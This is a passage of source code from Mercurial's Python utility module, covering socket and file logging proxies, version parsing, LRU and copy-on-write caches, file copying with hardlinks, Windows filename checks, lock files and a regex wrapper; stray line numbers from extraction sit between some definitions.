    """Turn a file object into a logging file object.

    ``fh`` is wrapped in a ``fileobjectproxy`` whose observer writes
    activity to ``logh``, prefixing each line with ``name``.
    """
    return fileobjectproxy(
        fh,
        fileobjectobserver(
            logh,
            name,
            reads=reads,
            writes=writes,
            logdata=logdata,
            logdataapis=logdataapis,
        ),
    )
959
960
960
961
class socketobserver(baseproxyobserver):
    """Logs socket activity.

    The socket analogue of ``fileobjectobserver``: each handler receives
    the proxied call's result (``res``) followed by the call's arguments
    and logs the event to ``self.fh``. ``reads``/``writes``/``states``
    toggle receive, send, and socket-state events respectively.
    """

    def __init__(
        self,
        fh,
        name,
        reads=True,
        writes=True,
        states=True,
        logdata=False,
        logdataapis=True,
    ):
        super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
        # Event-class toggles.
        self.reads = reads
        self.writes = writes
        self.states = states

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
            )
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recvfrom(%d, %d) -> %d'
                % (self.name, size, flags, len(res[0]))
            )

        # res is a (data, address) pair; only the data is logged.
        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recvfrom_into(%d, %d) -> %d'
                % (self.name, size, flags, res[0])
            )

        # res is (nbytes, address); log the filled portion of the buffer.
        self._writedata(buf[0 : res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
            )

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        # NOTE(review): unlike sendall()/sendto(), this write is not
        # guarded by self.logdataapis — confirm whether intentional.
        self.fh.write(
            b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
        )
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write(
                b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
            )

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        # sendto() has two call shapes: (data, address) and
        # (data, flags, address). If ``address`` is set we got the
        # four-argument form and ``flagsoraddress`` holds the flags.
        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write(
                b'%s> sendto(%d, %d, %r) -> %d'
                % (self.name, len(data), flags, address, res)
            )

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write(
            b'%s> setsockopt(%r, %r, %r) -> %r\n'
            % (self.name, level, optname, value, res)
        )
1094
1095
1095
1096
def makeloggingsocket(
    logh,
    fh,
    name,
    reads=True,
    writes=True,
    states=True,
    logdata=False,
    logdataapis=True,
):
    """Turn a socket into a logging socket.

    ``fh`` is wrapped in a ``socketproxy`` whose observer writes
    activity to ``logh``, prefixing each line with ``name``.
    """
    return socketproxy(
        fh,
        socketobserver(
            logh,
            name,
            reads=reads,
            writes=writes,
            states=states,
            logdata=logdata,
            logdataapis=logdataapis,
        ),
    )
1118
1119
1119
1120
def version():
    """Return version information if available."""
    try:
        from . import __version__
    except ImportError:
        # Not built/installed as a package: version metadata is absent.
        return b'unknown'
    else:
        return __version__.version
1128
1129
1129
1130
def versiontuple(v=None, n=4):
    """Parse a Mercurial version string into an ``n``-tuple.

    ``v`` is the version bytestring to parse; when empty/None, the
    running Mercurial's version string is used. ``n`` selects the tuple
    width: 2 -> (major, minor), 3 -> (major, minor, micro),
    4 -> (major, minor, micro, extra) where ``extra`` is the free-form
    suffix after the numeric part (e.g. rc tags, local build ids) or
    None when absent. Missing numeric components are None.
    """
    if not v:
        v = version()

    # Up to three dot-separated numbers, an optional '+'/'-' separator,
    # then everything else as the "extra" suffix.
    match = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
    if not match:
        numeric, extra = b'', v
    elif match.group(2):
        numeric, extra = match.groups()
    else:
        numeric, extra = match.group(1), None

    assert numeric is not None  # help pytype

    components = []
    for piece in numeric.split(b'.'):
        try:
            components.append(int(piece))
        except ValueError:
            break
    # Pad to three numeric slots: (3, 6) -> (3, 6, None).
    components.extend([None] * (3 - len(components)))

    if n == 2:
        return (components[0], components[1])
    if n == 3:
        return (components[0], components[1], components[2])
    if n == 4:
        return (components[0], components[1], components[2], extra)
1213
1214
1214
1215
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    if func.__code__.co_argcount == 0:
        # Zero-argument function: a one-element list doubles as the cache.
        listcache = []

        def f():
            if len(listcache) == 0:
                listcache.append(func())
            return listcache[0]

        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]

    else:

        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f
1244
1245
1245
1246
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        # _copied counts outstanding cheap copies; while any exist, a
        # write must first materialize a real copy via self.__class__(self).
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self
1263
1264
1264
1265
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    >>> d1.insert(1, b'a.5', 0.5)
    >>> d1
    sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
    '''

    def __setitem__(self, key, value):
        # Re-setting a key moves it to the end (last-set order).
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = pycompat.iteritems(src)
            for k, v in src:
                self[k] = v

    def insert(self, position, key, value):
        # Rebuild the tail: drop and re-append every entry at or after
        # `position`, slipping the new key in first.
        for (i, (k, v)) in enumerate(list(self.items())):
            if i == position:
                self[key] = value
            if i >= position:
                del self[k]
                self[k] = v
1300
1301
1301
1302
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
1327
1328
1328
1329
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
1334
1335
1335
1336
class transactional(object):  # pytype: disable=ignored-metaclass
    """Base class for making a transactional type into a context manager."""

    # Py2-style metaclass declaration; on Py3 this is an inert attribute,
    # kept for the pytype annotation above.
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Close only on clean exit; always release (which aborts if the
        # transaction was never closed).
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()
1361
1362
1362
1363
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # InterventionRequired is not an error: commit the transaction,
        # then let the exception propagate to the caller.
        tr.close()
        raise
    finally:
        tr.release()
1380
1381
1381
1382
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing (predates contextlib.nullcontext)."""
    yield
1385
1386
1386
1387
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """

    __slots__ = ('next', 'prev', 'key', 'value', 'cost')

    def __init__(self):
        self.next = None
        self.prev = None

        # `_notset` is the module-level sentinel distinguishing an empty
        # slot from a stored None value.
        self.key = _notset
        self.value = None
        self.cost = 0

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0
1409
1410
1410
1411
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new code. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """

    def __init__(self, max, maxcost=0):
        self._cache = {}

        # Circular list starts as a single empty node pointing at itself.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            self.totalcost -= node.cost
            del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        self.pop(k)

    def pop(self, k, default=_notset):
        try:
            node = self._cache.pop(k)
        except KeyError:
            if default is _notset:
                raise
            return default

        assert node is not None  # help pytype
        value = node.value
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

        return value

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self.__getitem__(k)
        except KeyError:
            return default

    def peek(self, k, default=_notset):
        """Get the specified item without moving it to the head

        Unlike get(), this doesn't mutate the internal state. But be aware
        that it doesn't mean peek() is thread safe.
        """
        try:
            node = self._cache[k]
            return node.value
        except KeyError:
            if default is _notset:
                raise
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        assert n is not None  # help pytype

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

    def _enforcecostlimit(self):
        # This should run after an insertion. It should only be called if total
        # cost limits are being enforced.
        # The most recently inserted node is never evicted.
        if len(self) <= 1 or self.totalcost <= self.maxcost:
            return

        # This is logically equivalent to calling popoldest() until we
        # free up enough cost. We don't do that since popoldest() needs
        # to walk the linked list and doing this in a loop would be
        # quadratic. So we find the first non-empty node and then
        # walk nodes until we free up enough capacity.
        #
        # If we only removed the minimum number of nodes to free enough
        # cost at insert time, chances are high that the next insert would
        # also require pruning. This would effectively constitute quadratic
        # behavior for insert-heavy workloads. To mitigate this, we set a
        # target cost that is a percentage of the max cost. This will tend
        # to free more nodes when the high water mark is reached, which
        # lowers the chances of needing to prune on the subsequent insert.
        targetcost = int(self.maxcost * 0.75)

        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        while len(self) > 1 and self.totalcost > targetcost:
            del self._cache[n.key]
            self.totalcost -= n.cost
            n.markempty()
            n = n.prev
1707
1708
1708
1709
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    # deque tracks insertion/access order so the oldest entry can be
    # evicted once the cache grows past 20 entries.
    order = collections.deque()
    if func.__code__.co_argcount == 1:

        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]

    else:

        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f
1738
1739
1739
1740
class propertycache(object):
    """Non-data descriptor caching the decorated method's result.

    The first attribute access computes the value and stores it in the
    instance __dict__, which shadows the descriptor on later accesses.
    """

    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1753
1754
1754
1755
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    # propertycache stores under the native-str name, so convert first.
    prop = pycompat.sysstr(prop)
    if prop in obj.__dict__:
        del obj.__dict__[prop]
1760
1761
1761
1762
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''

    def log2(x):
        # Index of the highest set bit (0 for x == 0).
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                # Jump straight to the magnitude of what we just emitted
                # if that is larger than plain doubling.
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield b''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield b''.join(buf)
1793
1794
1794
1795
def always(fn):
    """Matcher predicate that accepts everything."""
    return True
1797
1798
1798
1799
def never(fn):
    """Matcher predicate that rejects everything."""
    return False
1801
1802
1802
1803
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """

    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # Re-enable only if GC was on before, so nested nogc calls
            # don't turn it back on prematurely.
            if gcenabled:
                gc.enable()

    return wrapper
1827
1828
1828
1829
# On PyPy the tracing GC interacts badly with gc.disable(): code runs
# slower with the collector off, so make nogc a no-op decorator there.
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x
1832
1833
1833
1834
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        # nothing to be relative to: just localize n2
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # different drives (Windows): no relative path exists
            return os.path.join(root, localpath(n2))
        # rebase n2 onto root so both sides are absolute "/" paths
        n2 = b'/'.join((pconvert(root), n2))
    fromparts = splitpath(n1)
    toparts = n2.split(b'/')
    # strip the longest common leading component sequence
    common = 0
    limit = min(len(fromparts), len(toparts))
    while common < limit and fromparts[common] == toparts[common]:
        common += 1
    # climb out of what remains of n1, then descend into n2's remainder
    relparts = [b'..'] * (len(fromparts) - common) + toparts[common:]
    return pycompat.ossep.join(relparts) or b'.'
1859
1860
1860
1861
def checksignature(func, depth=1):
    '''wrap a function with code to check for calling errors'''

    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # A traceback exactly *depth* frames deep means the TypeError
            # came from the call site itself (bad signature), not from
            # deeper inside func's body — re-raise anything else untouched.
            frames = traceback.extract_tb(sys.exc_info()[2])
            if len(frames) == depth:
                raise error.SignatureError
            raise

    return check
1873
1874
1874
1875
# a whitelist of known filesystems where hardlink works reliably
# (lookup values come from getfstype(); anything else falls back to copy)
_hardlinkfswhitelist = {
    b'apfs',
    b'btrfs',
    b'ext2',
    b'ext3',
    b'ext4',
    b'hfs',
    b'jfs',
    b'NTFS',
    b'reiserfs',
    b'tmpfs',
    b'ufs',
    b'xfs',
    b'zfs',
}
1891
1892
1892
1893
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember dest's stat before it is replaced, to detect
            # timestamp ambiguity afterwards
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass  # fall back to normal copy
    if os.path.islink(src):
        # preserve the link itself rather than copying its target
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one:
                    # advance mtime by one second (kept within 31 bits)
                    # so the change remains detectable
                    advanced = (
                        oldstat.stat[stat.ST_MTIME] + 1
                    ) & 0x7FFFFFFF
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(stringutil.forcebytestr(inst))
1946
1947
1947
1948
def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible.

    hardlink=None means "decide from whether src and dst share a device";
    the decision (possibly downgraded after a failed link) is threaded
    through the recursion and returned, along with the file count, as
    (hardlink, num).
    """
    num = 0

    def settopic():
        if progress:
            progress.topic = _(b'linking') if hardlink else _(b'copying')

    if os.path.isdir(src):
        if hardlink is None:
            # hardlinking only makes sense within one filesystem
            hardlink = (
                os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
            )
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            # recurse; a failed link below may flip hardlink to False
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
            num += n
    else:
        if hardlink is None:
            hardlink = (
                os.stat(os.path.dirname(src)).st_dev
                == os.stat(os.path.dirname(dst)).st_dev
            )
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # fall back to copying for this and all remaining files
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        if progress:
            progress.increment()

    return hardlink, num
1989
1990
1990
1991
# File basenames (case-insensitive, extension stripped) that Windows
# reserves for devices; checked by checkwinfilename() below.
_winreservednames = {
    b'con',
    b'prn',
    b'aux',
    b'nul',
    b'com1',
    b'com2',
    b'com3',
    b'com4',
    b'com5',
    b'com6',
    b'com7',
    b'com8',
    b'com9',
    b'lpt1',
    b'lpt2',
    b'lpt3',
    b'lpt4',
    b'lpt5',
    b'lpt6',
    b'lpt7',
    b'lpt8',
    b'lpt9',
}
# Characters that may not appear anywhere in a Windows filename.
_winreservedchars = b':*?"<>|'
2016
2017
2017
2018
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith(b'\\'):
        return _(b"filename ends with '\\', which is invalid on Windows")
    if b'\\/' in path:
        return _(b"directory name ends with '\\', which is invalid on Windows")
    # examine each path component; both separators are accepted here
    for n in path.replace(b'\\', b'/').split(b'/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return (
                    _(
                        b"filename contains '%s', which is reserved "
                        b"on Windows"
                    )
                    % c
                )
            # control characters (0x00-0x1f) are never valid
            if ord(c) <= 31:
                return _(
                    b"filename contains '%s', which is invalid on Windows"
                ) % stringutil.escapestr(c)
        # device names are reserved regardless of extension (e.g. con.xml)
        base = n.split(b'.')[0]
        if base and base.lower() in _winreservednames:
            return (
                _(b"filename contains '%s', which is reserved on Windows")
                % base
            )
        # trailing dot or space is silently stripped by Windows;
        # '.' and '..' themselves are allowed
        t = n[-1:]
        if t in b'. ' and n not in b'..':
            return (
                _(
                    b"filename ends with '%s', which is not allowed "
                    b"on Windows"
                )
                % t
            )
2077
2078
2078
2079
# Pick the best available monotonic-ish timer for this interpreter:
# time.perf_counter where present (Python >= 3.3), otherwise the
# platform-appropriate legacy clock.
timer = getattr(time, "perf_counter", None)

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    if not timer:
        # on old Windows Pythons, time.clock has the higher resolution
        timer = time.clock
else:
    # mercurial.windows doesn't have platform.checkosfilename
    checkosfilename = platform.checkosfilename  # pytype: disable=module-attr
    if not timer:
        timer = time.time
2090
2091
2091
2092
def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    # first choice: a symlink whose target carries the lock info —
    # creation is atomic and fails if the lock already exists
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        # EEXIST means someone else holds the lock: propagate; any other
        # symlink failure falls through to the regular-file scheme
        if why.errno == errno.EEXIST:
            raise
    except AttributeError:  # no symlink in os
        pass

    # fallback: exclusive creation of a regular file holding the info
    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    fd = os.open(pathname, flags)
    os.write(fd, info)
    os.close(fd)
2110
2111
2111
2112
def readlock(pathname):
    """Return the lock info written by makelock().

    Mirrors makelock's two storage schemes: read the symlink target if
    the lock is a symlink, otherwise read the regular file's contents.
    """
    try:
        return readlink(pathname)
    except OSError as why:
        # EINVAL/ENOSYS: not a symlink (or symlinks unsupported) —
        # fall through to the regular-file scheme
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError:  # no symlink in os
        pass
    with posixfile(pathname, b'rb') as fp:
        return fp.read()
2122
2123
2123
2124
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        fd = fp.fileno()
    except AttributeError:
        # file-like object without a real descriptor: stat by its name
        return os.stat(fp.name)
    return os.fstat(fd)
2130
2131
2131
2132
2132 # File system features
2133 # File system features
2133
2134
2134
2135
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    origstat = os.lstat(path)
    dirname, base = os.path.split(path)
    # build a case-swapped sibling name to probe with
    probe = base.upper()
    if probe == base:
        probe = base.lower()
    if probe == base:
        # nothing foldable in the name: no evidence against sensitivity
        return True
    try:
        probestat = os.lstat(os.path.join(dirname, probe))
    except OSError:
        # swapped-case name doesn't resolve: filesystem distinguishes case
        return True
    # same inode under both spellings means case-insensitive lookup
    if probestat == origstat:
        return False
    return True
2157
2158
2158
2159
# Probe for the optional re2 regex engine.  _re2 is tri-state:
#   None  -> re2 imported but not yet verified to work (see _re._checkre2)
#   False -> re2 unavailable or broken; use the stdlib re module
#   True  -> set later by _re._checkre2 once a test match succeeds
try:
    import re2  # pytype: disable=import-error

    _re2 = None
except ImportError:
    _re2 = False
2165
2166
2166
2167
class _re(object):
    """Facade over the stdlib re module that transparently prefers re2.

    The module-level tri-state _re2 caches whether a working re2 is
    available; it is resolved lazily on first use.
    """

    def _checkre2(self):
        # Resolve the _re2 tri-state by actually exercising re2 once.
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        # re2 takes no flags argument: translate the two supported flags
        # into inline (?i)/(?m) prefixes; any other flag forces stdlib re
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = b'(?i)' + pat
            if flags & remod.MULTILINE:
                pat = b'(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern uses a feature re2 lacks: fall back to stdlib
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape
2209
2210
2210
2211
